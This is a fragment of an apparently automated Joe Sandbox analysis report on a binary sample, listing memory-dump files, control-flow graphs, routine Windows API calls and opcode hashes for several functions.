                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: cd7f3bf54a3d402375f696fb0fbb900a927ff898575bc3a3f121b3980eee8f80
                                                                                                                                                                                                                              • Instruction ID: 6066211af1d7d07cd653f606f9371d632e39e164dd2bb8c66f540c03e841ba53
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd7f3bf54a3d402375f696fb0fbb900a927ff898575bc3a3f121b3980eee8f80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 642129327443009BEB189B68DC8576CBBE2EBD6310F244A99E505976D4CB7566C08762
                                                                                                                                                                                                                              Function 00B07D30 Relevance: 1.9, APIs: 1, Instructions: 426COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 570 b07d30-b07db2 call b340f0 574 b08356-b08373 call b1cff1 570->574 575 b07db8-b07de0 call b17a00 call b05c10 570->575 582 b07de2 575->582 583 b07de4-b07e06 call b17a00 call b05c10 575->583 582->583 588 b07e08 583->588 589 b07e0a-b07e23 583->589 588->589 592 b07e54-b07e7f 589->592 593 b07e25-b07e34 589->593 594 b07eb0-b07ed1 592->594 595 b07e81-b07e90 592->595 596 b07e36-b07e44 593->596 597 b07e4a-b07e51 call b1d663 593->597 600 b07ed3-b07ed5 GetNativeSystemInfo 594->600 601 b07ed7-b07edc 594->601 598 b07e92-b07ea0 595->598 599 b07ea6-b07ead call b1d663 595->599 596->597 602 b08374 call b36c6a 596->602 597->592 598->599 598->602 599->594 605 b07edd-b07ee6 600->605 601->605 608 b08379-b0837f call b36c6a 602->608 611 b07f04-b07f07 605->611 612 b07ee8-b07eef 605->612 616 b082f7-b082fa 611->616 617 b07f0d-b07f16 611->617 614 b08351 612->614 615 b07ef5-b07eff 612->615 614->574 622 b0834c 615->622 616->614 620 b082fc-b08305 616->620 618 b07f18-b07f24 617->618 619 b07f29-b07f2c 617->619 618->622 623 b07f32-b07f39 619->623 624 b082d4-b082d6 619->624 625 b08307-b0830b 620->625 626 b0832c-b0832f 620->626 622->614 627 b08019-b082bd call b17a00 call b05c10 call b17a00 call b05c10 call b05d50 call b17a00 call b05c10 call b05730 call b17a00 call b05c10 call b17a00 call b05c10 call b05d50 call b17a00 call b05c10 call b05730 call b17a00 call b05c10 call b17a00 call b05c10 call b05d50 call b17a00 call b05c10 call b05730 call b17a00 call b05c10 call b17a00 call b05c10 call b05d50 call b17a00 call b05c10 call b05730 623->627 628 b07f3f-b07f9b call b17a00 call b05c10 call b17a00 call b05c10 call b05d50 623->628 633 b082e4-b082e7 624->633 634 b082d8-b082e2 624->634 629 b08320-b0832a 625->629 630 b0830d-b08312 625->630 631 b08331-b0833b 626->631 632 b0833d-b08349 626->632 669 b082c3-b082cc 627->669 656 b07fa0-b07fa7 628->656 629->614 630->629 636 b08314-b0831e 630->636 631->614 632->622 633->614 638 b082e9-b082f5 633->638 634->622 636->614 638->622 658 b07fa9 656->658 659 b07fab-b07fcb call b38bbe 656->659 658->659 664 b08002-b08004 659->664 665 b07fcd-b07fdc 659->665 664->669 670 b0800a-b08014 664->670 667 b07ff2-b07fff call b1d663 665->667 668 b07fde-b07fec 665->668 667->664 668->608 668->667 669->616 674 b082ce 669->674 670->669 674->624
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B07ED3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1721193555-0
                                                                                                                                                                                                                              • Opcode ID: e2803cfc8d5067bc66d66c11bca4d39ec629682cf788d6fc13af2bf8b21f898b
                                                                                                                                                                                                                              • Instruction ID: a522cb70e6c5188d4717f30d6d1cea3ebea067ade042cd43ce03d03b0d0461f9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2803cfc8d5067bc66d66c11bca4d39ec629682cf788d6fc13af2bf8b21f898b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38E1C271E006449BDB24BB28CC4B79E7BE1AB82720F9442D8E4556B3D2DF755F808BC6
                                                                                                                                                                                                                              Function 00B3D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 869 b3d82f-b3d83a 870 b3d848-b3d84e 869->870 871 b3d83c-b3d846 869->871 873 b3d850-b3d851 870->873 874 b3d867-b3d878 RtlAllocateHeap 870->874 871->870 872 b3d87c-b3d887 call b375f6 871->872 878 b3d889-b3d88b 872->878 873->874 875 b3d853-b3d85a call b39dc0 874->875 876 b3d87a 874->876 875->872 882 b3d85c-b3d865 call b38e36 875->882 876->878 882->872 882->874
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B3A813,00000001,00000364,00000006,000000FF,?,00B3EE3F,?,00000004,00000000,?,?), ref: 00B3D870
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: d34b22a65ec7fff5ba5093ffd83d83916b7254176d2bd27534e494aedd9d37ac
                                                                                                                                                                                                                              • Instruction ID: e924c600309c062da8b926ff2e7171d1afe26ef830d88df43dd992f6ef180f65
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d34b22a65ec7fff5ba5093ffd83d83916b7254176d2bd27534e494aedd9d37ac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADF0273264522466EB312A72BC01B5B3BD9DF81770F3981E1FD08A7191DE60FC0086E1
                                                                                                                                                                                                                              Function 00B087B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00B0DA1D,?,?,?,?), ref: 00B087B9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: 917af6131605523288ec0e1337e002e9e639015bac539645288b69f4c5c00f68
                                                                                                                                                                                                                              • Instruction ID: 8b4a1bfc02bad68d29b2e2ae604ec2fd34d22664c249322e4835c782df19e75e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 917af6131605523288ec0e1337e002e9e639015bac539645288b69f4c5c00f68
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08C08C2801260006FE1C053800868A937C9C9877F83F81BC8E4F04B1F5CA356D079620
                                                                                                                                                                                                                              Function 00B087B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00B0DA1D,?,?,?,?), ref: 00B087B9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
